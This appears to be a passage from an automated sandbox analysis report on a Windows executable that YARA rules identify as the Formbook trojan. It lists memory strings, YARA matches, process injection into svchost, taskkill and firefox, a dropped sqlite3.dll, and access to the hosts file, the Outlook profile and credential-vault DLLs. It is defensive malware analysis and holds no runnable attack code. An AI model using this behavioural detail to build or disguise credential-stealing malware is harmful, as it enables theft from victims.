        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_l
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_land
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.les-massage.online&utm_medium=parking&utm_campaign=s_la
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.les-massage.online&utm_medium=parking&u
        Source: taskkill.exe, 00000004.00000002.881943022.00000000038F2000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003E52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto
        Source: taskkill.exe, 00000004.00000002.881943022.0000000003DA8000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000004308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.les-massage.online&amp;reg_source=parking_auto
        Source: taskkill.exe, 00000004.00000002.881943022.0000000002DF4000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000002.881759199.0000000003354000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.495203034.00000000013B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/pk64/?8Xv=VLHph&00yp=D2L

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
        Source: sqlite3.dll.4.drStatic PE information: Number of sections : 18 > 10
        Source: ncOLm62YLB.exe, 00000000.00000003.356739082.0000000003E20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ncOLm62YLB.exe
        Source: ncOLm62YLB.exe, 00000000.00000003.356716192.0000000003C9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ncOLm62YLB.exe
        Source: ncOLm62YLB.exe, 00000000.00000002.360975901.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs ncOLm62YLB.exe
        Source: ncOLm62YLB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 00000002.00000002.437869561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.437818040.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.881475305.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.881601571.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.494804006.0000000000200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.881493642.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.881642213.0000000004A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.438755931.00000000028A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@29/12
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeFile created: C:\Users\user\AppData\Local\Temp\arrogatinglyJump to behavior
        Source: ncOLm62YLB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: taskkill.exe, 00000004.00000002.882427779.0000000061E91000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.4.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: ncOLm62YLB.exeReversingLabs: Detection: 55%
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeFile read: C:\Users\user\Desktop\ncOLm62YLB.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ncOLm62YLB.exe "C:\Users\user\Desktop\ncOLm62YLB.exe"
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ncOLm62YLB.exe"
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ncOLm62YLB.exe"Jump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mozglue.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wdscore.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: cryptui.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: riched32.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: ncOLm62YLB.exeStatic file information: File size 1400845 > 1048576
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dGGVPduKBhByY.exe, 00000003.00000002.881609853.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp, dGGVPduKBhByY.exe, 00000005.00000000.451603298.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp
        Source: Binary string: wntdll.pdb source: ncOLm62YLB.exe, 00000000.00000003.356812562.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, ncOLm62YLB.exe, 00000000.00000003.356393695.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.417591054.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.418903920.0000000000610000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.437933380.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.437933380.0000000000920000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000004.00000002.881754837.0000000002160000.00000040.00001000.00020000.00000000.sdmp, taskkill.exe, 00000004.00000003.439122970.0000000001FD0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000003.437479142.0000000001DF0000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000002.881754837.00000000022E0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: taskkill.pdbN source: svchost.exe, 00000002.00000002.437761199.0000000000284000.00000004.00000020.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881542796.0000000000774000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: taskkill.exe, 00000004.00000002.881622768.0000000000800000.00000004.00000020.00020000.00000000.sdmp, taskkill.exe, 00000004.00000002.881943022.0000000002A0C000.00000004.10000000.00040000.00000000.sdmp, dGGVPduKBhByY.exe, 00000005.00000000.451623846.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.495203034.0000000000FCC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: taskkill.pdb source: svchost.exe, 00000002.00000002.437761199.0000000000284000.00000004.00000020.00020000.00000000.sdmp, dGGVPduKBhByY.exe, 00000003.00000002.881542796.0000000000774000.00000004.00000020.00020000.00000000.sdmp
        Source: ncOLm62YLB.exeStatic PE information: real checksum: 0xa961f should be: 0x1566bc
        Source: sqlite3.dll.4.drStatic PE information: section name: /4
        Source: sqlite3.dll.4.drStatic PE information: section name: /19
        Source: sqlite3.dll.4.drStatic PE information: section name: /31
        Source: sqlite3.dll.4.drStatic PE information: section name: /45
        Source: sqlite3.dll.4.drStatic PE information: section name: /57
        Source: sqlite3.dll.4.drStatic PE information: section name: /70
        Source: sqlite3.dll.4.drStatic PE information: section name: /81
        Source: sqlite3.dll.4.drStatic PE information: section name: /92
        Source: C:\Windows\SysWOW64\taskkill.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ncOLm62YLB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
